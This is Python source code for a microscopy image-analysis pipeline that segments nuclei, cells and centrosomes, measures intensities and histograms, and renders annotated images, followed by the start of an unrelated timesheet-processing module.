* ch['render intensity']\n if operation == 'particle_in_cytoplasm' and ch['render']:\n background += _img * p.colors.alexa_594 * ch['render intensity']\n\n # ----------------------\n # RENDER GENERAL\n # ----------------------\n self._render_image(fig_general.gca(), dpos, background)\n name = 'r%d-c%d-f%d-p%s.jpg' % (row, col, fid, _ip)\n fpath = os.path.abspath(os.path.join(basepath, name))\n pil = canvas_to_pil(canvas_g)\n pil.save(ensure_dir(fpath))\n\n # ----------------------\n # RENDER CLOSEUPS\n # ----------------------\n for ix, smp in dpos.groupby('id'):\n self._render_image_closeup(fig_closeup.gca(), smp, background)\n name = 'r%d-c%d-f%d-p%s-i%d.pdf' % (row, col, fid, _ip, ix)\n fpath = os.path.abspath(os.path.join(basepath, name))\n fig_closeup.savefig(fpath)\n\n def _render_image(self, axg, df_row, bkg_img):\n w_um, h_um, _ = [s * self.um_per_pix for s in bkg_img.shape]\n frame = Polygon([(0, 0), (0, w_um), (h_um, w_um), (h_um, 0)])\n frx, fry = frame.exterior.xy\n axg.plot(frx, fry, color='red', linewidth=2, solid_capstyle='round', zorder=10)\n\n for ix, smp in df_row.groupby('id'):\n nucleus = shapely.wkt.loads(smp['nucleus'].iloc[0])\n cell = shapely.wkt.loads(smp['cell'].iloc[0]) if 'cell' in smp and not smp['cell'].isna().iloc[0] else None\n\n if 'c1' in smp and 'c2' in smp:\n c1 = shapely.wkt.loads(smp['c1'].iloc[0])\n c2 = shapely.wkt.loads(smp['c2'].iloc[0])\n centr = [c1, c2]\n else:\n centr = None\n\n p.render_cell(nucleus, cell, centr, base_zorder=20, ax=axg)\n if 'ring' in smp and not smp['ring'].isna().iloc[0]:\n ring = shapely.wkt.loads(smp['ring'].iloc[0])\n if ring.area > 0:\n p.render_polygon(ring, zorder=10, ax=axg)\n axg.text(nucleus.centroid.x + 2, nucleus.centroid.y - 1, ix, color='red', zorder=50)\n\n axg.plot([5, 5 + 10], [5, 5], c='w', lw=4)\n axg.text(5 + 1, 5 + 1.5, '10 um', color='w')\n\n axg.imshow(bkg_img, extent=[0, w_um, h_um, 0])\n axg.set_xlim([0, w_um])\n axg.set_ylim([0, h_um])\n axg.set_axis_on()\n\n def _render_image_closeup(self, axc, smp, bkg_img):\n assert len(smp) == 1, 'only one sample allowed'\n w_um, h_um, _ = [s * self.um_per_pix for s in bkg_img.shape]\n axc.cla()\n axc.set_facecolor('xkcd:salmon')\n\n nucleus = shapely.wkt.loads(smp['nucleus'].iloc[0])\n cell = shapely.wkt.loads(smp['cell'].iloc[0]) if 'cell' in smp and not smp['cell'].isna().iloc[0] else None\n\n if 'c1' in smp and 'c2' in smp:\n c1 = shapely.wkt.loads(smp['c1'].iloc[0])\n c2 = shapely.wkt.loads(smp['c2'].iloc[0])\n centr = [c1, c2]\n else:\n centr = None\n\n # render and save closeup image\n p.render_cell(nucleus, cell, centr, base_zorder=20, ax=axc)\n if 'ring' in smp and not smp['ring'].isna().iloc[0]:\n ring = shapely.wkt.loads(smp['ring'].iloc[0])\n if ring.area > 0:\n p.render_polygon(ring, zorder=10, ax=axc)\n\n # draw measured lines\n if \"act_int_lines\" in smp and not np.isnan(smp['act_int_lines'].iloc[0]):\n n_lines = int(smp['act_int_lines'].iloc[0])\n angle_delta = 2 * np.pi / n_lines\n minx, miny, maxx, maxy = nucleus.bounds\n radius = max(maxx - minx, maxy - miny)\n for angle in [angle_delta * i for i in range(n_lines)]:\n ray = LineString([nucleus.centroid,\n (nucleus.centroid.x + radius * np.cos(angle),\n nucleus.centroid.y + radius * np.sin(angle))])\n r_seg = ray.intersection(nucleus)\n if r_seg.is_empty:\n continue\n if type(r_seg) == MultiLineString:\n r_seg = r_seg[0]\n pt = Point(r_seg.coords[-1])\n\n for pt0, pt1 in m.pairwise(nucleus.exterior.coords):\n # if pt.touches(LineString([pt0, pt1])):\n if Point(pt).distance(LineString([pt0, pt1])) < 1e-6:\n # compute normal vector\n dx = pt1[0] - pt0[0]\n dy = pt1[1] - pt0[1]\n # touching point of the polygon line segment\n px, py = pt.x, pt.y\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n # get length from ring thickness\n length = 3\n\n # axc.plot(px, py, dx, c='green', marker='o', markersize=2)\n axc.plot([px, px - dy * length], [py, py + dx * length], c='magenta', lw=1)\n\n # draw line from nucleus centroid to point\n pt_x, pt_y = r_seg.xy\n axc.plot(list(pt_x), list(pt_y), c='gray', lw=0.5)\n\n # draw normals of nucleus polygon\n dx_v, dy_v = np.diff(nucleus.exterior.xy)\n for dx, dy, (px, py) in zip(dx_v, dy_v, nucleus.exterior.coords):\n x = px + dx / 2\n y = py + dy / 2\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n length = 1.5\n\n # axc.plot(x, y, c='yellow', marker='o', markersize=1)\n axc.arrow(x, y, -dy * length, dx * length, color='blue', head_width=0.5, ls='-', lw=0.1)\n\n _m = 30\n x0, xf = nucleus.centroid.x - _m, nucleus.centroid.x + _m\n y0, yf = nucleus.centroid.y - _m, nucleus.centroid.y + _m\n if x0 < 0: xf -= x0\n if y0 < 0: yf -= y0\n axc.imshow(bkg_img, extent=[0, w_um, h_um, 0])\n axc.set_xlim(x0, xf)\n axc.set_ylim(y0, yf)\n axc.plot([x0 + 5, x0 + 15], [y0 + 5, y0 + 5], c='w', lw=4)\n axc.text(x0 + 5, y0 + 7, '10 um', color='w', zorder=50)\n if \"cluster\" in smp:\n axc.text(nucleus.centroid.x, nucleus.centroid.y, smp[\"cluster\"].iloc[0], color='w', zorder=10)\n\n def _exec_op(self, img, op, cfg_row):\n img = img[cfg_row['number'].iloc[0]]\n assert len(img) > 0, 'no image for measurements'\n if cfg_row['flatfield'].iloc[0]:\n img = self._flat_field_correct(img, cfg_row['number'].iloc[0])\n if not self._mdf.empty:\n self._ix = ((self._mdf['row'] == self._row) &\n (self._mdf['col'] == self._col) &\n (self._mdf['fid'] == self._fid) &\n (self._mdf['p'] == self._zp))\n else:\n self._ix = self._mdf.index\n op(img, cfg=cfg_row)\n\n def _stack_operation(self, row, col, fid, configuration_row, op):\n assert len(configuration_row) == 1, \"only one configuration row allowed\"\n z_op = configuration_row['z_stack_aggregation'].iloc[0]\n self._row = row\n self._col = col\n self._fid = fid\n\n # get stack processing from configuration file and apply it to an image\n if z_op == 'use each image individually':\n logger.info(\"Processing each image in the stack individually.\")\n gr = self.files[(self.files['row'] == row) & (self.files['col'] == col) & (self.files['fid'] == fid)]\n for zp, z in gr.groupby('p'): # iterate over z positions\n logger.debug(\"Z stack %s\" % zp)\n self._zp = zp\n img = self.image(row, col, fid, zp)\n self._exec_op(img, op, configuration_row)\n elif z_op == 'do a max projection':\n logger.info(\"Performing a max projection on the stack previous processing.\")\n self._zp = \"max\"\n img = self.max_projection(row, col, fid)\n self._exec_op(img, op, configuration_row)\n else:\n logger.warning(\"Z_stack aggregation is bad configured. Nothing done for this operation.\")\n pass\n\n def measure(self, *args):\n if len(args) == 1 and isinstance(args[0], int):\n _id = args[0]\n r = self.files_gr.ix[_id - 1]\n row, col, fid = r['row'], r['col'], r['fid']\n logger.debug('measuring id=%d row=%d col=%d fid=%d' % (_id, row, col, fid))\n\n elif len(args) == 3 and np.all([np.issubdtype(a, np.integer) for a in args]):\n row, col, fid = args[0], args[1], args[2]\n else:\n logger.warning('nothing to save on this image')\n return pd.DataFrame()\n\n df = self._measure_row_col_fid(row, col, fid)\n name = 'r%d-c%d-f%d.csv' % (row, col, fid)\n df.to_csv(self.save_path(name, subdir='pandas'), index=False)\n if self._samples is None: self._samples = df\n return df\n\n def _measure_row_col_fid(self, row, col, fid):\n cfg_ch = self.configuration['channels']\n cfg = pd.DataFrame(cfg_ch)\n self._mdf = pd.DataFrame()\n # NOTE: all the extraction process and validation is done on the pixel space, and the final dataframe is in [um]\n\n # --------------------\n # Find nuclei\n # --------------------\n s = cfg[cfg['z_stack_aggregation'].apply(lambda l: l == 'use each image individually')]\n zstack_idv = len(s) > 0\n c = cfg[cfg['pipeline'].apply(lambda l: 'nucleus' in l)]\n assert len(c) > 0, 'nuclei finding step needed in configuration'\n assert len(c) < 2, 'only one nuclei finding step per batch allowed'\n if zstack_idv:\n c.loc[:, 'z_stack_aggregation'] = 'use each image individually'\n self._stack_operation(row, col, fid, c, self._measure_nuclei)\n\n # --------------------\n # Find cells\n # --------------------\n self.cells_measured = False\n c = cfg[cfg['pipeline'].apply(lambda l: 'cell' in l)]\n assert len(c) < 2, 'only one cell finding step per batch allowed'\n if len(c) == 1:\n self._stack_operation(row, col, fid, c, self._measure_cells)\n\n # --------------------\n # Intensity in nucleus\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'intensity_in_nucleus' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_intensity_in_nucleus)\n\n # --------------------\n # Ring around nucleus\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'ring_around_nucleus' in l)]\n assert len(c) < 2, 'only one ring measurement step per batch allowed at the moment'\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_ring_intensity_around_nucleus)\n\n # --------------------\n # Particle in cytoplasm\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'particle_in_cytoplasm' in l)]\n # assert len(c) == 0, 'cell finding step needed in configuration'\n assert len(c) < 2, 'only one particle_in_cytoplasm step per batch allowed'\n if len(c) == 1:\n assert self.cells_measured, 'particle_in_cytoplasm needs cell data'\n self._stack_operation(row, col, fid, c, self._measure_particle_in_cytoplasm)\n\n # --------------------\n # Histogram\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram)\n\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram_of_nucleus' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram_on_nucleus)\n\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram_of_ring' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram_on_ring)\n\n # --------------------\n # Line intensity\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'line_intensity_ring' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_line_intensity)\n\n # --------------------\n # Re label id column if analizing every image in the z-stack\n # --------------------\n if zstack_idv:\n self._relabel_id()\n\n return self._mdf\n\n def _measure_nuclei(self, nuclei_img, cfg, r=10):\n imgseg, nuclei = m.nuclei_segmentation(nuclei_img, radius=r * self.pix_per_um)\n nuclei = m.exclude_contained(nuclei)\n\n if len(nuclei) == 0:\n logger.warning(\"Couldn't find nuclei in image.\")\n return\n\n for nucleus in nuclei:\n nucl_bnd = (nucleus['boundary']\n .buffer(self.pix_per_um, join_style=1)\n .buffer(-self.pix_per_um, join_style=1)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n if nucl_bnd.is_empty: continue\n logger.debug(\"previous simplify %d, after %d\" %\n (len(nucleus['boundary'].exterior.coords), len(nucl_bnd.exterior.coords)))\n if nucl_bnd.area < np.pi * (3 * self.pix_per_um) ** 2: continue\n dna_int = m.integral_over_surface(nuclei_img, nucl_bnd)\n\n # convert everything to um space for dataframe construction\n n_bum = affinity.scale(nucl_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: Add units support\n d = pd.DataFrame(data={\n 'id': [nucleus['id']],\n 'row': [self._row],\n 'col': [self._col],\n 'fid': [self._fid],\n 'p': [self._zp],\n '%s_int' % cfg['tag'].iloc[0]: [int(dna_int)],\n '%s_dens' % cfg['tag'].iloc[0]: [int(dna_int / nucl_bnd.area)],\n 'nucleus': dumps(n_bum, rounding_precision=4),\n 'nuc_pix': dumps(nucl_bnd, rounding_precision=1),\n })\n self._mdf = self._mdf.append(d, ignore_index=True, sort=False)\n logger.debug(\"%d nuclei found in image\" % len(nuclei))\n\n return self._mdf.index\n\n def _measure_cells(self, cell_img, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n # generate an image based on nuclei found previously\n nuclei_img = np.zeros(cell_img.shape, dtype=np.bool)\n nuclei = list()\n for _id, nuc in self._mdf.set_index(\"id\").loc[self._ix, \"nuc_pix\"].iteritems():\n _nimg = m.generate_mask_from(nuc, cell_img.shape)\n nuclei_img = nuclei_img | _nimg\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n cells, cells_mask = m.cell_boundary(cell_img, nuclei_img)\n\n # filter polygons contained in others\n cells = m.exclude_contained(cells)\n logger.debug(\"%d cells found in image\" % len(cells))\n\n width, height = cell_img.shape\n frame = Polygon([(0, 0), (0, height), (width, height), (width, 0)])\n touching_fr = too_big = no_nuclei = two_nuclei = 0\n # iterate through all cells\n for cl in cells:\n logger.debug(\"processing cell id %d\" % cl['id'])\n cell_bnd = (cl['boundary']\n .buffer(self.pix_per_um, join_style=1)\n .buffer(-self.pix_per_um, join_style=1)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n logger.debug(\"previous simplify %d, after %d\" %\n (len(cl['boundary'].exterior.coords), len(cell_bnd.exterior.coords)))\n\n for _id, nucleus in self._mdf.loc[self._ix, \"nuc_pix\"]:\n valid_sample, reason = m.is_valid_sample(frame, cell_bnd, nucleus, nuclei)\n if reason == m.REJECTION_TOUCHING_FRAME: touching_fr += 1\n if reason == m.REJECTION_NO_NUCLEUS: no_nuclei += 1\n if reason == m.REJECTION_TWO_NUCLEI: two_nuclei += 1\n if reason == m.REJECTION_CELL_TOO_BIG: too_big += 1\n if valid_sample:\n tubulin_int = m.integral_over_surface(cell_img, cell_bnd)\n tub_density = tubulin_int / cell_bnd.area\n if tub_density < 150:\n logger.warning(\n \"Sample rejected after validation because it had a low tubulin density.\")\n logger.debug('tubulin density in cell: %0.2f, intensity %0.2f, area %0.2f' % (\n tub_density, tubulin_int, cell_bnd.area))\n continue\n\n # convert everything to um space for dataframe construction\n c_bum = affinity.scale(cell_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: Add units support\n ix = self._ix & (self._mdf['id'] == nucleus['id'])\n self._mdf.loc[ix, 'tubulin_int'] = int(tubulin_int)\n self._mdf.loc[ix, 'tubulin_dens'] = int(tubulin_int / cell_bnd.area)\n self._mdf.loc[ix, 'cell'] = dumps(c_bum, rounding_precision=4)\n self._mdf.loc[ix, 'cell_pix'] = dumps(cell_bnd, rounding_precision=1)\n\n logger.info(\"%d samples rejected because they were touching the frame\" % touching_fr)\n logger.info(\"%d samples rejected because cell didn't have a nucleus\" % no_nuclei)\n logger.info(\"%d samples rejected because cell had more than two nuclei\" % two_nuclei)\n logger.info(\"%d samples rejected because cell area was too big\" % too_big)\n if (~self._mdf.loc[self._ix, \"cell\"].isna()).any():\n self.cells_measured = True\n\n def _measure_intensity_in_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n\n nuclei = list()\n for _id, nuc in self._mdf.loc[self._ix, \"nuc_pix\"].set_index(\"id\").iteritems():\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n\n logger.debug(\"intensity_in_nucleus for nucleus id %d\" % _id)\n signal_int = m.integral_over_surface(image, nucl_bnd)\n signal_density = signal_int / nucl_bnd.area\n\n # TODO: scale intensity from pixels^2 to um^2\n self._mdf.loc[ix, '%s_int' % cfg['tag'].iloc[0]] = int(signal_int)\n self._mdf.loc[ix, '%s_dens' % cfg['tag'].iloc[0]] = int(signal_density)\n\n def _measure_ring_intensity_around_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n for ix, row in self._mdf[self._ix].iterrows():\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n thickness = float(cfg['rng_thickness'])\n thickness *= self.pix_per_um\n rng_bnd = (nucl_bnd\n .buffer(thickness)\n .difference(nucl_bnd)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n if rng_bnd.area > 0:\n rng_int = m.integral_over_surface(image, rng_bnd)\n if np.isnan(rng_int): continue\n rng_density = rng_int / rng_bnd.area\n else:\n logger.warning(\"Ring polygon with no area!\\r\\nThickness of ring set to %.2f [pix]\" % thickness)\n continue\n\n logger.debug(\"ring_around_nucleus on tag '%s' for nucleus id %d = %s\" % (\n cfg['tag'].iloc[0], row['id'], m.eng_string(rng_int, si=True, format='%.2f')))\n rng_um = affinity.scale(rng_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: scale intensity from pixels^2 to um^2\n self._mdf.loc[ix, 'ring'] = dumps(rng_um, rounding_precision=4)\n self._mdf.loc[ix, 'ring_pix'] = dumps(rng_bnd, rounding_precision=1)\n self._mdf.loc[ix, '%s_rng_int' % cfg['tag'].iloc[0]] = int(rng_int)\n self._mdf.loc[ix, '%s_rng_dens' % cfg['tag'].iloc[0]] = int(rng_density)\n # logger.debug(\"\\r\\n\" + str(self._mdf[ix]))\n\n def _measure_particle_in_cytoplasm(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n width, height = image.shape\n frame = Polygon([(0, 0), (0, height), (width, height), (width, 0)])\n\n nuclei = list()\n for _id, nuc in self._mdf.set_index(\"id\").loc[self._ix, \"nuc_pix\"].iteritems():\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n cell_bnd = shapely.wkt.loads(row[\"cell_pix\"])\n x0, y0, xf, yf = [int(u) for u in nucl_bnd.bounds]\n\n valid_sample, reason = m.is_valid_sample(frame, cell_bnd, nucl_bnd, nuclei)\n if not valid_sample: continue\n logger.debug(\"particle_in_cytoplasm for cell id %d\" % _id)\n\n centr_crop = image[y0:yf, x0:xf]\n logger.info('applying centrosome algorithm for nuclei %d' % _id)\n\n # load boundaries of um space for dataframe construction\n n_bum = shapely.wkt.loads(row[\"nucleus\"])\n c_bum = shapely.wkt.loads(row[\"cell\"])\n\n cntr = m.centrosomes(centr_crop, min_size=0.2 * self.pix_per_um,\n max_size=0.5 * self.pix_per_um,\n threshold=0.01)\n cntr[:, 0] += x0\n cntr[:, 1] += y0\n cntrsmes = list()\n for k, c in enumerate(cntr):\n pt = Point(c[0], c[1])\n pti = m.integral_over_surface(image, pt.buffer(1 * self.pix_per_um))\n cntrsmes.append(\n {'id': k, 'pt': Point(c[0] / self.pix_per_um, c[1] / self.pix_per_um), 'i': pti})\n cntrsmes = sorted(cntrsmes, key=lambda ki: ki['i'], reverse=True)\n\n logger.debug('found {:d} centrosomes'.format(len(cntrsmes)))\n\n twocntr = len(cntrsmes) >= 2\n c1 = cntrsmes[0] if len(cntrsmes) > 0 else None\n c2 = cntrsmes[1] if twocntr else None\n\n lc = 2 if c2 is not None else 1 if c1 is not None else np.nan\n # TODO: Add units support\n self._mdf.loc[ix, 'centrosomes'] = lc\n self._mdf.loc[ix, 'c1'] = c1['pt'].wkt if c1 is not None else None\n self._mdf.loc[ix, 'c2'] = c2['pt'].wkt if c2 is not None else None\n self._mdf.loc[ix, 'c1_int'] = c1['i'] if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_int'] = c2['i'] if c2 is not None else np.nan\n self._mdf.loc[ix, 'c1_d_nuc_centr'] = n_bum.centroid.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_nuc_centr'] = n_bum.centroid.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_nuc_bound'] = n_bum.exterior.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_nuc_bound'] = n_bum.exterior.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_cell_centr'] = c_bum.centroid.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_cell_centr'] = c_bum.centroid.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_cell_bound'] = c_bum.exterior.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_cell_bound'] = c_bum.exterior.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'nuc_centr_d_cell_centr'] = n_bum.centroid.distance(c_bum.centroid)\n self._mdf.loc[ix, 'c1_d_c2'] = c1['pt'].distance(c2['pt']) if twocntr else np.nan\n\n # if len(self._mdf) > 0:\n # # Compute SNR: Step 1. Calculate standard deviation of background\n # logger.debug('computing std dev of background for SNR calculation')\n # std_pericentrin = np.std(_img[cells_mask])\n # # u_pericentrin = np.mean(_img[cells_mask])\n # self._mdf['snr_c1'] = self._mdf['c1_int'].apply(lambda i: i / std_pericentrin if not np.isnan(i) else np.nan)\n # self._mdf['snr_c2'] = self._mdf['c2_int'].apply(lambda i: i / std_pericentrin if not np.isnan(i) else np.nan)\n\n def _measure_histogram(self, image, cfg):\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n histogram, edges = np.histogram(image.ravel(), bins)\n\n if self._ix.any():\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n else:\n d = pd.DataFrame(data={\n 'id': [None],\n 'row': [self._row],\n 'col': [self._col],\n 'fid': [self._fid],\n 'p': [self._zp],\n 'hist_edges': [np.array2string(edges, **_hist_edges_arr_ops)],\n '%s_hist' % tag: [np.array2string(histogram.astype(int), separator=',')],\n })\n self._mdf = self._mdf.append(d, ignore_index=True, sort=False)\n\n def _measure_histogram_on_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"nuc_pix\" in self._mdf[self._ix], \"nucleus detection step needed\"\n\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n logger.debug(\"histogram_on_nucleus for nucleus id %d\" % _id)\n\n histogram, edges = m.histogram_of_surface(image, nucl_bnd, bins)\n\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_nuc_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n\n def _measure_histogram_on_ring(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"ring_pix\" in self._mdf[self._ix], \"ring detection step needed\"\n\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n rng_bnd = shapely.wkt.loads(row[\"ring_pix\"])\n logger.debug(\"histogram_on_nucleus for nucleus id %d\" % _id)\n\n histogram, edges = m.histogram_of_surface(image, rng_bnd, bins)\n\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_rng_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n\n def _measure_line_intensity(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"ring_pix\" in self._mdf[self._ix], \"ring detection step needed\"\n\n width, height = [s for s in image.shape]\n tag = cfg['tag'].iloc[0]\n n_lines = cfg['n_lines'].iloc[0]\n rng_thick = cfg['rng_thickness'].iloc[0]\n rng_thick *= self.pix_per_um\n angle_delta = 2 * np.pi / n_lines\n frame = Polygon([(0, 0), (0, width), (height, width), (height, 0)]).buffer(-rng_thick * self.pix_per_um)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucleus = shapely.wkt.loads(row[\"nuc_pix\"])\n logger.debug(\"line_intensity for nucleus id %d\" % _id)\n\n minx, miny, maxx, maxy = nucleus.bounds\n radius = max(maxx - minx, maxy - miny)\n for k, angle in enumerate([angle_delta * i for i in range(n_lines)]):\n ray = LineString([nucleus.centroid,\n (nucleus.centroid.x + radius * np.cos(angle),\n nucleus.centroid.y + radius * np.sin(angle))])\n r_seg = ray.intersection(nucleus)\n # print(r_seg, ray)\n if r_seg.is_empty:\n continue\n if type(r_seg) == MultiLineString:\n r_seg = r_seg[0]\n # print(r_seg)\n pt = Point(r_seg.coords[-1])\n if not frame.contains(pt):\n continue\n\n for pt0, pt1 in m.pairwise(nucleus.exterior.coords):\n # if pt.touches(LineString([pt0, pt1])):\n if Point(pt).distance(LineString([pt0, pt1])) < 1e-6:\n # compute normal vector\n dx = pt1[0] - pt0[0]\n dy = pt1[1] - pt0[1]\n # touching point of the polygon line segment\n px, py = pt.x, pt.y\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n\n r0, c0, r1, c1 = np.array([px, py, px - dy * rng_thick, py + dx * rng_thick]).astype(int)\n lin = LineString([(r0, c0), (r1, c1)])\n rr, cc = draw.line(r0, c0, r1, c1)\n\n # TODO: Add units support\n ix = self._ix & (self._mdf['id'] == _id)\n self._mdf.loc[ix, '%s_line_%02d' % (tag, k)] = np.array2string(image[cc, rr], separator=',')\n # self._mdf.loc[ix, '%s_line_%02d_sum' % (tag, k)] = m.integral_over_line(image, lin).astype(int)\n self._mdf.loc[ix, '%s_int_lines' % tag] = int(n_lines)\n\n # FIXME: not measuring nucleus\n # lin = r_seg\n r0, c0, r1, c1 = np.array(r_seg).flatten().astype(int)\n rr, cc = draw.line(r0, c0, r1, c1)\n self._mdf.loc[ix, '%s_nuc_line_%02d' % (tag, k)] = np.array2string(image[cc, rr], separator=',')\n # self._mdf.loc[ix, '%s_nuc_line_%02d_sum' % (tag, k)] = m.integral_over_line(image, lin).astype(int)\n\n def _relabel_id(self):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n\n def _fn(df):\n z = df[\"p\"].unique()\n for k, (_ix, nuc) in enumerate(df.loc[df[\"p\"] == min(z), \"nuc_pix\"].iteritems()): # for every nuclei\n nucleus = shapely.wkt.loads(nuc).buffer(2 * self.pix_per_um)\n in_nuc_ix = df[\"nuc_pix\"].apply(lambda v: nucleus.contains(shapely.wkt.loads(v)))\n df.loc[in_nuc_ix, \"zid\"] = k\n\n return df\n\n group = [\"row\", \"col\", \"fid\"]\n self._mdf = self._mdf.groupby(group).apply(_fn).reset_index(drop=True)\n","repo_name":"fabio-echegaray/operetta","sub_path":"operetta/cfg_channels.py","file_name":"cfg_channels.py","file_ext":"py","file_size_in_byte":43967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"32804694384","text":"import logging\nimport datetime\nfrom collections import OrderedDict\nfrom timesheet.calendar import Calendar\nfrom timesheet.timesheet import Timesheet\n\n#-----------------------------------------------------------------------\nclass TsData:\n #region = None\n #team = None\n #weeks = None\n\n def __init__(self,region,team,weeks,flData):\n self.region = region\n self.team = team\n self.weeks = weeks\n\n tsDict = self.GetFileList(flData,weeks,region)\n self.tsdict = self.ReadTimesheets(tsDict)\n\n #---------------------------------------------------------------------\n def GetFileList(self,flData,weeks,region):\n tsDict = OrderedDict()\n now = datetime.date.today().strftime(\"%Y-%m-%d\")\n week = Calendar.GetWeek(now)\n for idx in range(1,week):\n tsDict[Calendar.week[idx]] = None\n\n for i in weeks:\n wsDate = Calendar.week[i]\n if (wsDate in flData.weeks):\n if (flData.weeks[wsDate] != None):\n tsDict[wsDate] = OrderedDict()\n for item in flData.weeks[wsDate]:\n tsDict[wsDate][item] = flData.weeks[wsDate][item]\n else:\n logging.debug('Skipping ' + region + ' Filelist for week ' + str(i).rjust(2) + ' - ' + str(wsDate))\n\n# logging.debug('Building ' + region + ' Filelist for week ' + str(i+1).rjust(2) + ' ' + str(wsDate))\n# dict = flData.weeks[wsDate]\n# for key,value in dict.items():\n# list.append(value)\n# tslist.append(sorted(list))\n# else:\n# logging.debug('Skipping ' + region + ' Filelist for week ' + str(i+1).rjust(2) + ' ' + str(wsDate))\n\n return tsDict\n\n #---------------------------------------------------------------------\n def ReadTimesheets(self,tsDict):\n for wsDate in tsDict:\n faeDict = tsDict[wsDate]\n if (faeDict):\n for name in faeDict:\n ts = Timesheet(faeDict[name],wsDate)\n ts.ReadFile()\n tsDict[wsDate][name].timeSheet = ts\n\n return 